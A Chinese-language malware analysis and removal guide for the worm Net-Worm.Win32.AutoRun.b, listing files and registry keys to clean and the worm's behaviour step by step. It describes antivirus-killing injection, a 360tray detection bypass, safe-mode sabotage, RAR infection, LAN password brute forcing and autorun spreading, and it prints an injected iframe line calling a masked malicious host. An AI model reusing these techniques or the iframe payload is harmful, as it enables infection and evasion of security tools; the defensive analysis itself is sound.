网络蠕虫Net-Worm.Win32.AutoRun.b的处理方法
1、手动恢复以下文件:
拷贝相同版本文件到: %SystemRoot%\system32\qmgr.dll
拷贝相同版本文件到: %SystemRoot%\system32\drivers\etc\hosts
手动或用工具清除所有压缩包中的病毒
手动或用工具恢复所有网页文件。
2、手动删除以下文件:
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X为所有盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X为所有盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X为所有盘符)
3、手动删除以下注册表值:
键: HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\[所有劫持]
4、手动恢复以下注册表值:
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS
值: Start
数据: 0x00000003
修复安全模式:
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
键:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
变量声明:
%SystemDriver% 系统所在分区,通常为“C:\”
%SystemRoot% WINDODWS所在目录,通常为“C:\Windows”
%Documents and Settings% 用户文档目录,通常为“C:\Documents and Settings”
%Temp% 临时文件夹,通常为“C:\Documents and Settings\当前用户名称\Local Settings\Temp”
%ProgramFiles% 系统程序默认安装目录,通常为:“C:\ProgramFiles”
病毒分析
(1)停止名为"BITS"的服务,去掉%SystemRoot%\system32\qmgr.dll文件保护属性,并释放动态链接
库%SystemRoot%\system32\qmgr.dll,替换掉正常的qmgr.dll,启动"BITS"服务,通过该服务加载病毒程序。
(2)检查%SystemRoot%\system32\qmgr.dll是否被360tray.exe检测,如果是,则创建一个名为"360SpShadow0"的设备,通过发送IO控
制码的方式控制该设备从而绕过360tray.exe的检测。
(3) 创建线程,获取当前进程快照,查找进程"avp.exe"、"bdagent.exe"、"360tray.exe"是否存在,如果找到,则
将%SystemRoot%\system32\qmgr.dll复制为%SystemRoot%\system32\1l1.dll,将%SystemRoot%\system32\1l1.dll注入到目标进
程空间,并将杀软进程主线程终止,使其进程退出,完成之后,删除%SystemRoot%\system32\1l1.dll。
(4)创建线程,删除注册表相关键值,使用户无法进入安全模式,创建名为"SvcMain"的服务,释放驱动%TEMP%\SvcMain.sys并加载,
通过该驱动程序恢复SSDT,完成之后,删除%TEMP%\SvcMain.sys,并删除服务对应的注册表键值。之后,删除大部分杀软的服务,
并作镜像劫持。
(5)创建线程,查找所有文件后缀名为htm、html、asp、aspx的网页文件,如果找到,往目标文件中插入代码<iframe
src=http://mm.uu8***7.cn/index/mm.htm width=100 height=0></iframe>,并开启一个新进程执行%ProgramFiles%\Internet
Explorer\iexplore.exe,通过iexplore.exe访问嵌入的恶意网址。
(6)创建线程,新建文件%TEMP%\TempLocal.txt,访问目标网址读取内容,将读取的内容写入TempLocal.txt,并访问TempLocal.txt文
件中保存的网址,下载新病毒到本地运行。
(7)查找并修改文件%SystemRoot%\System32\drivers\etc\hosts。
(8)释放文件%SystemRoot%\System32\dllcache\lsasvc.dll,并运行。
(9)创建线程,遍历所有盘符,查找所有rar压缩包文件,如果找到,通过调用%ProgramFiles%\WinRAR\Rar.exe程序将其解压,将 病毒程序复制到解压出的文件夹中,然后再压缩回去,完成将病毒添加到压缩包中的功能。
(10)创建线程,扫描局域网其它主机,并通过自带的弱口令列表尝试枚举其它主机的管理密码,如果枚举成功,从指定网址下载病毒程
序到本地执行,并复制到其它主机的所有共享文件夹中运行。
(11)创建线程,遍历当前所有盘符,在每个盘符下创建文件autorun.inf,并在每个盘符下创建文件夹recycle.{645FF040-5081-101B-9F08-00AA002F954E},并将%SystemRoot%\System32\dllcache\lsasvc.dll重命名为Ghost.exe复制到
recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe,使用户一但双击磁盘或打开资源管理器自动运行病毒Ghost.exe
(12)创建线程,不断读取%TEMP%\TempLocal.txt文件中的网址,下载新病毒。
(13)创建线程,释放病毒程序%TEMP%\syshost.exe,并开启新进程执行该程序。
(14) 释放批处理文件%TEMP%\TempDel.bat,并运行,将病毒自身重命名复制到%SystemRoot%\system32\dllcache\lsasvc.dll,之后删除自身和TempDel.bat。
病毒创建文件:
%TEMP%\SvcMain.sys
%TEMP%\syshost.exe
%TEMP%\TempLocal.txt
%TEMP%\TempDel.bat
%SystemRoot%\system32\1l1.dll
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\System32\dllcache\lsasvc.dll
X:\autorun.inf (X为各个盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E} (X为各个盘符)
X:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Ghost.exe (X为各个盘符)
病毒修改文件:
%SystemRoot%\system32\qmgr.dll
%SystemRoot%\system32\drivers\etc\hosts
病毒删除文件:
%TEMP%\SvcMain.sys
%TEMP%\TempDel.bat
病毒创建进程:
iexplore.exe
病毒创建注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[映像劫持]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
病毒修改注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ BITS\Start
病毒删除注册表:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SvcMain
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
病毒访问网络:
http://m...uu***67.cn/index/mm.htm
http://w....d***04.com/msn/mm.txt
http://w....d***567.cn/down/qqmm.exe
http://w....d***567.cn/down/qqma.exe
